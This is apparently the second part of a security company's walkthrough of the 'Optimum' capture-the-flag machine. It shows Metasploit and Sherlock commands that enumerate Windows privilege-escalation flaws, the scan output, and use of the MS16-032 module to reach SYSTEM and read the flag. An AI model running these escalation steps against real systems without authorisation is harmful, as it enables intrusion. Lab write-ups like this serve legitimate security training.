- Email: info@clearinfosec.com
- 1800 760 5656
As we saw in the first part of this Optimum walkthrough, it is a beginner-level machine that is more of an enumeration of services with known exploits. These exploits are easy to work out and get the flag.
Let us continue from where we left.
As I had an issue with Windows-Exploit-Suggester I am using Metasploit to do privilege escalation.
msf6 exploit> use post/multi/recon/local_exploit_suggester
before using the post-exploitation, we have to know the session
then set the session in my case
>set SESSION 1
Sherlock
PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities: https://github.com/rasta-mouse/Sherlock/
We have to import the Sherlock script to Powershell to execute it. DO NOT USE SHELL !! it won’t work. Use Powershell
meterpreter> powershell_import /home/kali/Downloads/Sherlock/Sherlock.ps1
meterpreter>powershell_execute Find-AllVulns
Title : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID : 2010-0232
Link : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems
Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable
Title : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID : 2013-1300
Link : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID : 2013-3881
Link : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable
Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable
Title : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID : 2015-2426, 2015-2433
Link : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable
Title : ‘mrxdav.sys’ WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
Link : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems
Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable
Title : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID : 2016-0093/94/95/96
Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Appears Vulnerable
Title : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID : 2016-7255
Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable
Title : Nessus Agent 6.6.2 – 6.10.3
MSBulletin : N/A
CVEID : 2017-7199
Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable
There are only 3 exploits that seem to work MS16-135, MS16-032, MS16-034.
Out of three only MS-16-032 – This module exploits the lack of sanitization of standard handles in Windows’ Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2008-2012 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.
Now let’s see if the exploit is available in Metasploit
>search ms16-032
We got the exploit so now set the necessary options and don’t forget to set the session. Without setting the session the exploit will not work
EXPLOITED !!! We got the session perfectly and after checking the id
>getuid
Server username: NT AUTHORITY\SYSTEM
Now finally to get the flag we have to go to the administrator folder
>type\Users\Administrator\Desktop\root.txt
We successfully pwned(owned) the system.
You can also use this exploit https://www.exploit-db.com/exploits/41020/